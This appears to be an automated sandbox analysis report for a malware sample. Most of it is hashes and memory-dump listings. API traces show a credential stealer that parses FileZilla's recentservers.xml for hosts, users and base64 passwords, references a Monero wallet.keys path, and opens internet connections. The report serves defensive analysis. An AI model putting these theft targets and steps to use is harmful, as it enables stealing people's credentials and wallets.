                                • Instruction ID: fba675195ae82f0089080afaf10dc4b7354eb24ca6181472d5e4bcf5f481d017
                                • Opcode Fuzzy Hash: 528501d093106100ea44b1c5e07491e36a32c20cb221d20ea9cc4e08ff377120
                                • Instruction Fuzzy Hash: 495146F3A086009FD7046F2DEC4577AF7EAEFD4720F1A852DEAC487340EA3548448696
                                Function 011E5DB5 Relevance: 2.7, Strings: 1, Instructions: 1417COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Fm{}
                                • API String ID: 0-1028336946
                                • Opcode ID: 144e833b3cfb2db4128e1def7e36d416f143e4b27821ea1ddc990d3c6585214c
                                • Instruction ID: 51068e41b42efe49e85066cffc40a5c80400edab46196f208acba818201dd35e
                                • Opcode Fuzzy Hash: 144e833b3cfb2db4128e1def7e36d416f143e4b27821ea1ddc990d3c6585214c
                                • Instruction Fuzzy Hash: 2D9229F360C2049FE304AE2DEC8567AFBE9EF94660F1A493DE6C4C3744E63598058796
                                Function 010BA14D Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Cg
                                • API String ID: 0-2454403474
                                • Opcode ID: 0d99d8e997c6df10b85e5d97961b5c6512c59a532ac2e46e5cfe97491b4a7050
                                • Instruction ID: b504af1b2e9230897789ab76316b3295dbc22f9006c09efd4d35a6eb306763c7
                                • Opcode Fuzzy Hash: 0d99d8e997c6df10b85e5d97961b5c6512c59a532ac2e46e5cfe97491b4a7050
                                • Instruction Fuzzy Hash: DD5135F290C2049BE344BE28DC8577AB7E5EF94310F06893CEAC493744E97A98158787
                                Function 011D0608 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -Ulm
                                • API String ID: 0-3810557418
                                • Opcode ID: 7240b3e1e0246d01175147ee5b3f2e490de2b4ea0cd7f4e72b9e03a952d092fd
                                • Instruction ID: 114840205528825a319ea1cb23b2fb6cb2e6ae110044fc360c1fba77dfeb77dd
                                • Opcode Fuzzy Hash: 7240b3e1e0246d01175147ee5b3f2e490de2b4ea0cd7f4e72b9e03a952d092fd
                                • Instruction Fuzzy Hash: D94158F3F583045BE3449D7DEC8972A76CAD7D0214F2E8639D685C7788FC79A40A8282
                                Function 0114CEE5 Relevance: .3, Instructions: 255COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4851ff66d7c0ee1e572c659a01ceeab29d5f36c877281b63188589e37cf0f08c
                                • Instruction ID: 2c9cc0b29d6aa9b04540a4c6d0db45302378d6805c1bc53f110e55dbf2776fc7
                                • Opcode Fuzzy Hash: 4851ff66d7c0ee1e572c659a01ceeab29d5f36c877281b63188589e37cf0f08c
                                • Instruction Fuzzy Hash: FC715CF3A086145BE3087A2DDC9577ABAD6DBD4320F1B463DDB85C3744F97949058282
                                Function 0113DBD4 Relevance: .2, Instructions: 250COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fca6440b47104166095e9733bc4d51a9c57d8b44f70ced461bc495e8f7ffe6d
                                • Instruction ID: 2aa2235a7d03c3e011152cc06a94420e7e9bbbc4a4fa4b61f160a26c3eb348ec
                                • Opcode Fuzzy Hash: 2fca6440b47104166095e9733bc4d51a9c57d8b44f70ced461bc495e8f7ffe6d
                                • Instruction Fuzzy Hash: 3F8127F39483049BE3086E39EC8477AB7D9EB90320F17493DEAC493780E93959458696
                                Function 0126E098 Relevance: .2, Instructions: 202COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 79d4962ef1266c347e8bc39fab766384912f5a74e27abd038ae04fc847b326e3
                                • Instruction ID: ae35d0eb4563fd6be1185147403e24f42403528c7c3cfb8e8880db26c4ba74c7
                                • Opcode Fuzzy Hash: 79d4962ef1266c347e8bc39fab766384912f5a74e27abd038ae04fc847b326e3
                                • Instruction Fuzzy Hash: 525105F251C204EFD314AF18EC85ABAB7E9EF98720F06483DE6C487640E6710850CB87
                                Function 011A251D Relevance: .2, Instructions: 202COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 81ab1af8da8a324af299b53e21fba94ce897054b7f3a03c42ab94744c5711b45
                                • Instruction ID: e3b6aa2813ade4448c98e6309270bbebdf02d4df3b9cebede02b7056c7ac2eea
                                • Opcode Fuzzy Hash: 81ab1af8da8a324af299b53e21fba94ce897054b7f3a03c42ab94744c5711b45
                                • Instruction Fuzzy Hash: EC5157F3E182105BE704692DDCC576AB7D9EBA4320F2B463CEF9893784E9359C0582D6
                                Function 010B0DE9 Relevance: .2, Instructions: 160COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb55e2127c316115da2c713516164166e3716b99f73461ebf252e3c5aec2b060
                                • Instruction ID: 3669e08884fcf68c4cfb6a3b788540976bce9ec0cd91048ff4b2d0f6c27326ad
                                • Opcode Fuzzy Hash: eb55e2127c316115da2c713516164166e3716b99f73461ebf252e3c5aec2b060
                                • Instruction Fuzzy Hash: 42413AB36087044FF718AE3CEC8577BB7D5EB94320F45863DDA8087B84F93A59458286
                                Function 00E29750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00E20250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00E30DBA,00E30DB7,00E30DB6,00E30DB3), ref: 00E20362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E20369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E20385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E203CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E203DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00E20419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E20463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E2051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E2054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E20562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00E20571
                                • lstrcat.KERNEL32(?,url: ), ref: 00E20580
                                • lstrcat.KERNEL32(?,00000000), ref: 00E20593
                                • lstrcat.KERNEL32(?,00E31678), ref: 00E205A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00E205B5
                                • lstrcat.KERNEL32(?,00E3167C), ref: 00E205C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00E205D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00E205E6
                                • lstrcat.KERNEL32(?,00E31688), ref: 00E205F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00E20604
                                • lstrcat.KERNEL32(?,00000000), ref: 00E20617
                                • lstrcat.KERNEL32(?,00E31698), ref: 00E20626
                                • lstrcat.KERNEL32(?,00E3169C), ref: 00E20635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E2068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 105d82da05ae2ec2b5991064d2e138ca85b669fa6ba72431d98fd43d3d2f8454
                                • Instruction ID: 668d35909f2fb92efaaae6b2c9a26bf1d80a0c947dd018a4520bf64b7d201abb
                                • Opcode Fuzzy Hash: 105d82da05ae2ec2b5991064d2e138ca85b669fa6ba72431d98fd43d3d2f8454
                                • Instruction Fuzzy Hash: 18D11172900218ABCB18EBF4ED9ADEE77B8FF54300F545528F502B7085DE75AA05CB61
                                Function 00E15960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E159F8
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E15A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E15B93
